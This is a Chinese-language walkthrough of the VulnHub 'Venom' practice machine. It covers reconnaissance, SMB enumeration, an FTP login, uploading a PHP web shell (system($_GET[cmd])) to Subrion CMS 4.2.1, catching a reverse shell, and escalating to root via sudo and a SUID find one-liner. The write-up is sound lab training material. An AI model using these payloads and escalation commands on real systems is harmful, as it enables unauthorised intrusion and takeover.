vulnhub-Venom

记录打靶机（Venom）过程

参考：
https://nepcodex.com/2021/06/venom-walkthrough-vulnhub-writeup/
https://grumpygeekwrites.wordpress.com/2021/06/20/vulnhub-venom-walk-through-tutorial-writeup/

主机发现

使用arp-scan进行存活IP探测

sudo arp-scan 192.168.109.0/24
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d6:59:a7, IPv4: 192.168.109.140
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.109.2   00:50:56:f0:a1:15       VMware, Inc.
192.168.109.1   00:50:56:c0:00:08       VMware, Inc.
192.168.109.147 00:0c:29:90:08:c7       VMware, Inc.
192.168.109.254 00:50:56:f8:89:68       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 4 responded

经探测可知目标IP为192.168.109.147，接下来对此IP进行端口扫描，尝试获取更多信息

端口扫描

nmap -sC -sV -p- 192.168.109.147   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 09:08 EDT
Nmap scan report for 192.168.109.147
Host is up (0.00032s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/https   Apache/2.4.29 (Ubuntu)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: VENOM; OS: Unix

Host script results:
|_clock-skew: mean: 6h09m59s, deviation: 3h10m31s, median: 7h59m58s
|_nbstat: NetBIOS name: VENOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: venom
|   NetBIOS computer name: VENOM\x00
|   Domain name: \x00
|   FQDN: venom
|_  System time: 2021-07-29T02:38:46+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-28T21:08:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.02 seconds

经扫描可知目标开放了21（ftp）、80（http）、139（smb）、443（https）、445（smb）等多个端口。

整理一下思路针对不同端口：

ftp（21）端口：
- 尝试匿名用户登录打岔 ✘
  * 漏洞数据库搜索相关版本漏洞，此处版本过高暂没有利用漏洞打岔 ✘
http（80）端口：
- 读取源码，尝试获取敏感信息 ✔（此处在做的过程中没有仔细查看，漏掉重要突破口）
smb（139、445）端口：
- 可以尝试使用MSF中ms 07-010进行漏洞探测 ✗
  * 枚举SMB服务 ✔
https（443）端口
- 此端口暂没有什么思路

以上思路经过验证并参考大神思路后得知突破口在http（80）端口

目录扫描

dirb http://192.168.109.147:80/ 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 31 11:10:45 2021
URL_BASE: http://192.168.109.147:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.109.147:80/ ----
+ http://192.168.109.147:80/index.html (CODE:200|SIZE:11004)                                                                                                                      
+ http://192.168.109.147:80/server-status (CODE:403|SIZE:280)                                                                                                                     
                                                                                                                                                                                  
-----------------
END_TIME: Sat Jul 31 11:10:48 2021
DOWNLOADED: 4612 - FOUND: 2

经扫描index.html返回200，此页面是Ubuntu LogoApache2 Ubuntu Default Page，所以当时没想到查看源码，淦。在源码结尾藏有一段MD5加密的字符串：

解码

经解密后得到hostinger,参考网上思路后得知需要枚举SMB服务，小笔记记下，因为对445端口做信息收集还是第一次

枚举SMB服务

参考网上使用enum4linux进行枚举

enum4linux -a 192.168.109.147
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 28 09:18:59 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.109.147
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.109.147    |
 ======================================================= 
[+] Got domain/workgroup name: WORKGROUP

 =============================================== 
|    Nbtstat Information for 192.168.109.147    |
 =============================================== 
Looking up status of 192.168.109.147
        VENOM           <00> -         B <ACTIVE>  Workstation Service
        VENOM           <03> -         B <ACTIVE>  Messenger Service
        VENOM           <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.109.147    |
 ======================================== 
[+] Server 192.168.109.147 allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for 192.168.109.147    |
 ============================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    OS information on 192.168.109.147    |
 ========================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.109.147 from smbclient: 
[+] Got OS info for 192.168.109.147 from srvinfo:
        VENOM          Wk Sv PrQ Unx NT SNT venom server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ================================ 
|    Users on 192.168.109.147    |
 ================================ 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ============================================ 
|    Share Enumeration on 192.168.109.147    |
 ============================================ 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (venom server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.109.147
//192.168.109.147/print$        Mapping: DENIED, Listing: N/A
//192.168.109.147/IPC$  [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ======================================================= 
|    Password Policy Information for 192.168.109.147    |
 ======================================================= 


[+] Attaching to 192.168.109.147 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] VENOM
        [+] Builtin

[+] Password Info for Domain: VENOM

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ================================= 
|    Groups on 192.168.109.147    |
 ================================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================== 
|    Users on 192.168.109.147 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3525385883-4254613925-43684688
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-3525385883-4254613925-43684688 and logon username '', password ''

...skip...

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nathan (Local User)
S-1-22-1-1002 Unix User\hostinger (Local User)

 ================================================ 
|    Getting printer info for 192.168.109.147    |
 ================================================ 
No printers returned.


enum4linux complete on Wed Jul 28 09:19:14 2021

经过枚举可以发现hostinger是使用者之一，结合之前解密的MD5值进行ftp登录

ftp登录

ftp 192.168.109.147
Connected to 192.168.109.147.
220 (vsFTPd 3.0.3)
Name (192.168.109.147:kali): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 May 21 23:43 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             384 May 21 23:43 hint.txt
226 Directory send OK.
ftp> get hint.txt
local: hint.txt remote: hint.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hint.txt (384 bytes).
226 Transfer complete.
384 bytes received in 0.04 secs (10.3970 kB/s)

可以登录成功，可以发现files目录下存在hint.txt，下载下来查看内容

	Hey there... 

T0D0 --

* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password 


Have fun .. :)

在hint.txt中存在两段base64编码的字符串

Base64 解码

echo 'WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=' | base64 -d | base64 -d | base64 -d
standard vigenere cipher                                                 
┌──(kali㉿kali)-[~/Desktop]
└─$ echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d                            
https://cryptii.com/pipes/vigenere-cipher

第一段需要解码4次，第二段解码为一个网址

整理信息：

解码bash64得到相关信息

盒子主机名为venom.box

1	You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher

添加主机名到主机文件中，访问域名可得到新的页面，此处参考另一种思路，在https://cryptii.com/pipes/vigenere-cipher可以解密得到dora的密码

登录venom.box

此处可以看到版本信息为Subrion CMS 4.2.1
在exploit-db中搜索可以得到该版本存在一个文件上传漏洞

漏洞利用

通过构造一句话木马上传后以获得shell，根据提示可以得知因为该版本中.htaccess文件中忽略了 .pht、 .phar文件后缀的文件

1 2	cat php-shell.phar <?php system($_GET[cmd]); ?>

成功执行命令

获取shell

通过前面上传的一句话木马执行python反向连接shell

此时需要监听4444 端口

nc -lvp 4444                                                                                                                                                               1 ⨯
listening on [any] 4444 ...
connect to [192.168.109.140] from venom.box [192.168.109.147] 33098
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功获取shell
此时是在upload目录的
切换到home目录下查看存在用户

cd /home
cd /home
$ ls -lart
ls -lart
total 16
drwxr-xr-x 24 root      root      4096 May 20 10:08 ..
drwxr-xr-x  4 root      root      4096 May 21 17:00 .
drwxr-x--- 17 nathan    nathan    4096 May 22 00:21 nathan
drwxr-xr-x 16 hostinger hostinger 4096 May 22 13:58 hostinger

使用hostinger/hostinger登录，登录成功后在/var/www/html/subrion/backup下.htaccess文件中存在nathan密码

切换nathan用户，可获取第一个flag

su nathan
su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

nathan@venom:/var/www/html/subrion/backup$ id
id
uid=1000(nathan) gid=1000(nathan) groups=1000(nathan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
nathan@venom:/var/www/html/subrion/backup$ cd 
cd 
nathan@venom:~$ ls
ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
nathan@venom:~$ cat user.txt
cat user.txt
W3_@r3_V3n0m:P

权限提升

尝试sudo提权

sudo -l 
sudo -l 
Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su

参考得知这里直接运行sudo bash即可提权

sudo -l 
sudo -l 
Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su
nathan@venom:~$ sudo bash
sudo bash
root@venom:~# id
id
uid=0(root) gid=0(root) groups=0(root)

第二种方式
通过查找设置了SUID位的文件
find / -perm -4000 -exec ls -al {} \; 2>/dev/null

nathan@venom:~$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 1473576 Apr 20 10:15 /opt/VBoxGuestAdditions-6.1.20/bin/VBoxDRMClient
-rwsr-s--- 1 root nathan 238080 Nov  5  2017 /usr/bin/find
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44528 Mar 23  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Mar 23  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 22528 Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 75824 Mar 23  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Mar 23  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 23  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Jul  3  2020 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 113528 Jul 10  2020 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 378600 Jul 23  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43088 Mar  5  2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Mar  5  2020 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 23  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 17  2020 /snap/core18/2066/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 23  2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 26696 Sep 17  2020 /snap/core18/2066/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 23  2019 /snap/core18/2066/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 23  2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 23  2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 23  2019 /snap/core18/2066/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 23  2019 /snap/core18/2066/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /snap/core18/2066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Mar  5  2020 /snap/core18/1885/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 23  2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 26696 Mar  5  2020 /snap/core18/1885/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 23  2019 /snap/core18/1885/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 23  2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 23  2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 23  2019 /snap/core18/1885/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 23  2019 /snap/core18/1885/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /snap/core18/1885/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Jul 11  2020 /snap/snapd/8542/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 111080 Apr 24 17:35 /snap/snapd/11841/usr/lib/snapd/snap-confine

这里参考网上思路，使用find进行提权并读取第二个flag

$ pwd
pwd
/home/nathan
$ /usr/bin/find . -exec /bin/sh -p \; -quit         
/usr/bin/find . -exec /bin/sh -p \; -quit
# id
id
uid=1000(nathan) gid=1000(nathan) euid=0(root) groups=1000(nathan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
# cd /root/
cd /root/
# ls
ls
root.txt  snap
# cat root.txt
cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.

done

总结

不够细心
没有清晰的渗透步骤，脑子太乱
坚持